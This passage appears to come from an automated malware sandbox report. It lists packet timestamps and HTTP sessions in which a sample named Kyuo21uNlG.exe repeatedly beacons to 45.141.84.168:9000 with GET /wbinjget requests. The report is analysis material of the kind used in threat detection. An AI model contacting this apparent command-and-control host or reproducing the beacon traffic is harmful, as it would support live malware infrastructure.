                                          Nov 28, 2024 13:40:44.126926899 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.126980066 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.130302906 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.130384922 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.142828941 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.142883062 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.143019915 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.149276972 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.149420023 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.152522087 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.152565002 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.161786079 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.161850929 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.161946058 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.178153992 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.181212902 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.181286097 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.181296110 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.187649965 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.187716007 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.200855970 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.204265118 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.204325914 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.204329967 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.216749907 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.216876030 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.216952085 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.224822044 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.230782986 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.242814064 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.242861986 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.243077993 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.252008915 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.254776001 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.260963917 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.261037111 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.261112928 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.272150040 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.274775028 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.274916887 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.274977922 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.284091949 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.286731958 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.287765980 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.287808895 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.287909031 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.292917967 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.298815012 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.299627066 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.299698114 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.305488110 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.310204029 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.314913034 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.315005064 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.315072060 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.320878983 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.326694012 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.328192949 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.328229904 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.328368902 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.343075037 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.343239069 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.343467951 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.348639011 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.350856066 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.362833977 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.365504980 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.365537882 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.372359037 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.374697924 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.385859966 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.390885115 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.400414944 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.400492907 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.400568008 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.402580023 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.406686068 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.407847881 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.407934904 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.412209034 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.414684057 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.420459986 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.422688961 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.426136017 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.430690050 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.436115980 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.438714027 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.444235086 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.444292068 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.444370031 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.448868036 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.453619003 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.453639984 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.459584951 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.459598064 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.459675074 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.472544909 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.474776983 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.485500097 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.487771034 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.487972021 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.501637936 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.502288103 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.502330065 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.517987013 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.522243977 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.525957108 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.528850079 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.532747984 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.536046982 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.538242102 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.538266897 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.551136017 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.552023888 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.554708958 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.560868025 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.564753056 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.564934015 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.575072050 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.575968981 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.576241970 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.589278936 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.597712040 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.598346949 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.601538897 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.602752924 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.615895987 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.621068001 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.621113062 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.621150017 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.626655102 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.626718044 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.631944895 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.631999969 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.632030964 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.642251968 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.642374039 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.648633003 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.648705006 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.654973984 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.655224085 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.660648108 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.660722971 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.660743952 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.672070026 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.672137022 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.673928976 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.676683903 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.684854031 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.688004971 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.689186096 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.689210892 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.689235926 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.709799051 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.710915089 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.715333939 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.715404987 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.715492964 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.730259895 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.732585907 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.735893011 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.736001015 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.745527983 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.745639086 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.752475023 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.753429890 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.753433943 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.753500938 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.762305975 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.765772104 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.768352985 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.768429041 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.768435001 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.775489092 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.777650118 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.781840086 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.781919003 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.781990051 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.795227051 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.797012091 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.798928976 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.799002886 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.809101105 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.810986042 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.812638044 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.812655926 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.812702894 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.827605009 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.827672958 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.827738047 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.827789068 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.829658985 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.829741001 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.835454941 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.835707903 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.843617916 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.843667030 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.855948925 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.856288910 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.856368065 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.856508017 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.861248970 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.861355066 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.873326063 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.873409986 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.873996019 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.885777950 CET90004987945.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.886081934 CET90004987945.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.886131048 CET498799000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.886179924 CET498799000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.886435032 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.886502028 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.886590958 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.897937059 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.898020029 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.898066998 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.902669907 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.902839899 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.911197901 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.911248922 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.915626049 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.915705919 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.919594049 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.919831991 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.932728052 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.932796955 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.937361956 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.943119049 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.943155050 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.943217993 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.949634075 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.949690104 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.953785896 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.963682890 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.970900059 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.970944881 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.970962048 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.976775885 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.976830959 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.990669012 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.990695000 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.990747929 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.998241901 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.998416901 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:45.002763033 CET498829000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:45.006122112 CET90004987945.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:45.010437965 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:45.010507107 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:45.010571003 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:45.022797108 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:45.022866011 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:45.028613091 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:45.028717995 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:45.032318115 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:45.032349110 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:45.032371998 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:45.039978981 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:45.040081978 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:45.053920031 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:45.054001093 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:45.054001093 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:45.057410955 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:45.057425022 CET156474973045.141.84.168192.168.2.4
                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.44973145.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:39:06.137933969 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:39:07.500983953 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:39:07 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.44973245.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:39:07.747252941 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:39:09.149799109 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:39:08 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          2192.168.2.44973345.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:39:09.387105942 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:39:10.789706945 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:39:10 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          3192.168.2.44973445.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:39:11.012892962 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:39:12.415647984 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:39:12 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          4192.168.2.44973545.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:39:12.652268887 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:39:14.008791924 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:39:13 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          5192.168.2.44973645.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:39:14.230396032 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:39:15.541883945 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:39:15 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          6192.168.2.44973745.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:39:15.816481113 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:39:17.140165091 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:39:16 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          7192.168.2.44973845.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:39:17.371562004 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
